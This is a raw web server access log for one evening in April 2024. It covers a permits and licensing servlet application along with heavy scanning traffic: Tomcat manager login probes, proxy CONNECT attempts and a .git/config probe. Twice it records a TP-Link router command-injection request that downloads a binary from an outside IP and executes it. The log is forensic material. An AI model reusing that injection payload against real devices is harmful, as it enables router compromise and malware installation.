190.171.141.106 - - [18/Apr/2024:18:10:41 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a376fed6ffcef179e269c2a815f8683d01d80dca96aced8075aa5788c1bfb3c7e1a326c89737914ad80162e02df97a8724bd,gx-no-cache=1713474424074 HTTP/1.1" 200 83
47.238.237.95 - - [18/Apr/2024:18:10:42 -0300] "OPTIONS / HTTP/1.1" 400 -
218.38.210.48 - tomcat [18/Apr/2024:18:11:08 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:18:12:28 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:18:12:31 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a3769fb0034d41844e4eccc69cf651ad629d777a705f95cc1768c5d312fc6917b9cef899e12d97c96f9b6fd70cb1efa11936,gx-no-cache=1713474534103 HTTP/1.1" 200 47
190.171.141.138 - - [18/Apr/2024:18:12:33 -0300] "POST /cormun/servlet/trpermisosgoce?b0ab1f5a32f84fb9b4bb99608cef28d5,gx-no-cache=1713474535169 HTTP/1.1" 200 10463
190.171.141.106 - - [18/Apr/2024:18:12:42 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a3769fb0034d41844e4eccc69cf651ad629db252175307930a61349146b0cb0c95ae4c364e4b01fc58c6aa5b973ae47f136a,gx-no-cache=1713474544869 HTTP/1.1" 200 47
218.38.210.48 - tomcat [18/Apr/2024:18:13:09 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:18:13:25 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713474587526 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:18:13:25 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1032
190.171.141.106 - - [18/Apr/2024:18:13:25 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713473774937 HTTP/1.1" 200 11863
190.171.141.106 - - [18/Apr/2024:18:13:41 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7188
190.171.141.138 - - [18/Apr/2024:18:13:48 -0300] "GET /cormun/servlet/trpermisosadjuntos?17238751,20240418160748,P, HTTP/1.1" 200 6835
190.171.141.138 - - [18/Apr/2024:18:13:50 -0300] "GET /cormun/servlet/permisosadjuntos?INS,17238751,P,20240418160748,, HTTP/1.1" 200 6133
190.171.141.138 - - [18/Apr/2024:18:13:50 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.141.106 - - [18/Apr/2024:18:13:57 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a376fed6ffcef179e269c2a815f8683d01d80dca96aced8075aa5788c1bfb3c7e1a326c89737914ad80162e02df97a8724bd,gx-no-cache=1713474620211 HTTP/1.1" 200 85
190.171.141.138 - - [18/Apr/2024:18:13:58 -0300] "POST /cormun/servlet/permisosadjuntos?b0ab1f5a32f84fb9b4bb99608cef28d5,INS,17238751,P,20240418160748,, HTTP/1.1" 200 116
190.171.141.138 - - [18/Apr/2024:18:13:58 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1041
190.171.141.138 - - [18/Apr/2024:18:13:59 -0300] "GET /cormun/servlet/trpermisosadjuntos?17238751,20240418160748,P, HTTP/1.1" 200 7325
190.171.141.138 - - [18/Apr/2024:18:14:01 -0300] "POST /cormun/servlet/trpermisosadjuntos?b0ab1f5a32f84fb9b4bb99608cef28d5,17238751,20240418160748,P,,gx-no-cache=1713474623427 HTTP/1.1" 200 90
190.171.141.138 - - [18/Apr/2024:18:14:01 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 1007
190.171.141.138 - - [18/Apr/2024:18:14:01 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713474535169 HTTP/1.1" 200 13571
190.171.141.138 - - [18/Apr/2024:18:14:04 -0300] "POST /cormun/servlet/trpermisosgoce?b0ab1f5a32f84fb9b4bb99608cef28d5,gx-no-cache=1713474535169,gx-no-cache=1713474626035 HTTP/1.1" 200 10453
190.171.141.138 - - [18/Apr/2024:18:14:04 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.141.138 - - [18/Apr/2024:18:14:04 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.141.138 - - [18/Apr/2024:18:14:04 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.141.138 - - [18/Apr/2024:18:14:04 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.141.106 - - [18/Apr/2024:18:14:27 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a3769fb0034d41844e4eccc69cf651ad629d6fc6aca75a19dc75d4b582c41208aedc59711be843d5e5b7cd5acf6e0c2f1359,gx-no-cache=1713474650271 HTTP/1.1" 200 48
190.171.141.106 - - [18/Apr/2024:18:14:42 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713474664534 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:18:14:42 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1032
190.171.141.106 - - [18/Apr/2024:18:14:42 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713473774937 HTTP/1.1" 200 12046
218.38.210.48 - tomcat [18/Apr/2024:18:15:10 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:18:15:43 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7188
190.171.141.106 - - [18/Apr/2024:18:16:38 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a3766a73232ff939054a20ccff1ae47115570dca96aced8075aa5788c1bfb3c7e1a326c89737914ad80162e02df97a8724bd,gx-no-cache=1713474780784 HTTP/1.1" 200 82
190.171.141.106 - - [18/Apr/2024:18:16:55 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a3766a88152483044feeac8b7736ea46ecb3f727b12c999fad2bd827387b35174586f899e12d97c96f9b6fd70cb1efa11936,gx-no-cache=1713474797665 HTTP/1.1" 200 47
190.171.141.106 - - [18/Apr/2024:18:17:09 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713474811640 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:18:17:09 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1032
190.171.141.106 - - [18/Apr/2024:18:17:09 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713473774937 HTTP/1.1" 200 12326
218.38.210.48 - tomcat [18/Apr/2024:18:17:12 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.149.74 - - [18/Apr/2024:18:18:41 -0300] "POST /cormun/servlet/trlicencias?434719ff59e29cb960d12cb0ec116dfd,gx-no-cache=1713474902779 HTTP/1.1" 440 972
190.171.149.74 - - [18/Apr/2024:18:18:42 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 6047
190.171.149.74 - - [18/Apr/2024:18:18:43 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1737
190.171.149.74 - - [18/Apr/2024:18:18:49 -0300] "POST /cormun/servlet/hlogin?4481c38d95921277be8f0f9ce0efc30f,gx-no-cache=1713474911147 HTTP/1.1" 200 90
190.171.149.74 - - [18/Apr/2024:18:18:49 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 958
190.171.149.74 - - [18/Apr/2024:18:18:50 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 13806
218.38.210.48 - tomcat [18/Apr/2024:18:19:13 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:18:20:53 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713475036241 HTTP/1.1" 200 9334
190.171.141.106 - - [18/Apr/2024:18:20:54 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713475036656 HTTP/1.1" 200 9314
209.141.55.133 - tomcat [18/Apr/2024:18:21:07 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:18:21:09 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7188
218.38.210.48 - tomcat [18/Apr/2024:18:21:15 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:18:22:00 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a3762ae3629bcbd827c09290292b3af555040dca96aced8075aa5788c1bfb3c7e1a326c89737914ad80162e02df97a8724bd,gx-no-cache=1713475103232 HTTP/1.1" 200 80
180.149.125.164 - - [18/Apr/2024:18:22:11 -0300] "GET / HTTP/1.1" 200 11217
190.171.141.106 - - [18/Apr/2024:18:22:31 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a37696b75cd42f0c1dd7c6fc94f14d4dd1e56c9da63e377d88149beddacabd9448aff899e12d97c96f9b6fd70cb1efa11936,gx-no-cache=1713475134111 HTTP/1.1" 200 47
190.171.141.106 - - [18/Apr/2024:18:22:57 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713475160026 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:18:22:57 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1032
190.171.141.106 - - [18/Apr/2024:18:22:58 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713473774937 HTTP/1.1" 200 12318
218.38.210.48 - tomcat [18/Apr/2024:18:23:16 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:25:18 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:27:20 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:29:24 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:18:29:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:31:27 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:33:28 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:35:30 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:37:31 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:18:38:23 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:39:34 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:41:36 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:43:39 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:45:39 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:18:46:57 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:47:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:49:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:51:44 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.143.90 - - [18/Apr/2024:18:52:18 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1724
190.171.143.90 - - [18/Apr/2024:18:52:25 -0300] "POST /cormun/servlet/hlogin?421b34bda80ba9947095971ca75f784f,gx-no-cache=1713476927580 HTTP/1.1" 200 90
190.171.143.90 - - [18/Apr/2024:18:52:25 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 952
190.171.143.90 - - [18/Apr/2024:18:52:25 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4324
190.171.143.90 - - [18/Apr/2024:18:52:33 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 14791
218.38.210.48 - tomcat [18/Apr/2024:18:53:46 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:18:55:32 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:55:47 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:57:49 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:18:59:50 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:01:51 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:19:04:00 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:04:13 -0300] "GET /manager/html HTTP/1.1" 403 3196
103.155.85.130 - - [18/Apr/2024:19:06:15 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:16 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:16 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:16 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:17 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:17 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:18 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:18 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:18 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:19 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:19 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:19 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:20 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:20 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:21 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - tomcat [18/Apr/2024:19:06:21 -0300] "GET /manager/html HTTP/1.1" 403 3196
103.155.85.130 - - [18/Apr/2024:19:06:21 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:22 -0300] "GET /manager/html HTTP/1.1" 401 2474
103.155.85.130 - - [18/Apr/2024:19:06:22 -0300] "GET /manager/html HTTP/1.1" 401 2474
218.38.210.48 - tomcat [18/Apr/2024:19:06:38 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:09:04 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:11:27 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:19:12:36 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:13:52 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:16:16 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:18:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:21:04 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:19:21:08 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:23:27 -0300] "GET /manager/html HTTP/1.1" 403 3196
37.252.221.214 - - [18/Apr/2024:19:25:30 -0300] "GET / HTTP/1.1" 200 11217
218.38.210.48 - tomcat [18/Apr/2024:19:25:51 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:28:15 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:19:29:39 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:30:38 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:32:57 -0300] "GET /manager/html HTTP/1.1" 403 3196
185.36.81.40 - - [18/Apr/2024:19:33:46 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
218.38.210.48 - tomcat [18/Apr/2024:19:34:58 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:37:03 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:19:38:13 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:39:07 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:41:08 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:43:13 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:45:16 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:19:46:50 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:47:20 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:49:22 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:51:28 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:19:53:34 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:19:55:42 -0300] "GET /manager/html HTTP/1.1" 403 3196
45.227.254.8 - - [18/Apr/2024:19:59:03 -0300] "/*àCookie: mstshash=Administr " 400 -
218.38.210.48 - tomcat [18/Apr/2024:20:00:57 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:03:14 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:20:04:25 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:05:28 -0300] "GET /manager/html HTTP/1.1" 403 3196
179.43.190.218 - - [18/Apr/2024:20:07:33 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 1013
218.38.210.48 - tomcat [18/Apr/2024:20:10:09 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:12:11 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:20:13:03 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:14:20 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:16:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:19:08 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:21:32 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:20:21:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:23:56 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:26:19 -0300] "GET /manager/html HTTP/1.1" 403 3196
78.108.177.50 - - [18/Apr/2024:20:26:23 -0300] "GET / HTTP/1.0" 200 11197
218.38.210.48 - tomcat [18/Apr/2024:20:28:50 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:20:30:27 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:31:22 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:33:46 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:36:10 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:38:36 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:20:39:18 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:41:00 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:43:24 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:45:49 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:20:48:11 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:48:15 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:50:40 -0300] "GET /manager/html HTTP/1.1" 403 3196
198.235.24.226 - - [18/Apr/2024:20:52:15 -0300] "GET / HTTP/1.1" 200 11217
218.38.210.48 - tomcat [18/Apr/2024:20:53:03 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:55:28 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:20:57:03 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:57:50 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:20:59:49 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:21:01:53 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:21:03:54 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:21:05:54 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:21:05:56 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:21:08:00 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:21:14:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:21:23:33 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:21:32:36 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:21:41:37 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - - [18/Apr/2024:21:48:24 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.55.133 - tomcat [18/Apr/2024:21:50:37 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - - [18/Apr/2024:21:58:29 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.55.133 - tomcat [18/Apr/2024:21:59:43 -0300] "GET /manager/html HTTP/1.1" 403 3196
162.142.125.217 - - [18/Apr/2024:22:05:45 -0300] "GET / HTTP/1.1" 200 11217
162.142.125.217 - - [18/Apr/2024:22:05:48 -0300] "GET / HTTP/1.1" 200 11217
162.142.125.217 - - [18/Apr/2024:22:05:49 -0300] "PRI * HTTP/2.0" 505 -
162.142.125.217 - - [18/Apr/2024:22:05:49 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
218.38.210.48 - - [18/Apr/2024:22:08:34 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.55.133 - tomcat [18/Apr/2024:22:08:48 -0300] "GET /manager/html HTTP/1.1" 403 3196
80.75.212.75 - - [18/Apr/2024:22:17:09 -0300] "CONNECT www.google.com:443 HTTP/1.1" 400 -
209.141.55.133 - tomcat [18/Apr/2024:22:18:01 -0300] "GET /manager/html HTTP/1.1" 403 3196
94.156.71.224 - - [18/Apr/2024:22:23:32 -0300] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 -
209.141.55.133 - tomcat [18/Apr/2024:22:27:09 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:22:36:25 -0300] "GET /manager/html HTTP/1.1" 403 3196
5.77.10.31 - - [18/Apr/2024:22:42:00 -0300] "GET / HTTP/1.1" 200 11217
209.141.55.133 - tomcat [18/Apr/2024:22:45:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:22:55:02 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:23:04:36 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:23:14:21 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:23:23:58 -0300] "GET /manager/html HTTP/1.1" 403 3196
106.75.165.113 - - [18/Apr/2024:23:30:10 -0300] "GET /.git/config HTTP/1.1" 404 983
209.141.55.133 - tomcat [18/Apr/2024:23:33:37 -0300] "GET /manager/html HTTP/1.1" 403 3196
217.27.124.139 - - [18/Apr/2024:23:33:52 -0300] "GET / HTTP/1.0" 200 11197
209.141.55.133 - tomcat [18/Apr/2024:23:43:11 -0300] "GET /manager/html HTTP/1.1" 403 3196
179.43.190.218 - - [18/Apr/2024:23:51:00 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 1013
209.141.55.133 - tomcat [18/Apr/2024:23:53:04 -0300] "GET /manager/html HTTP/1.1" 403 3196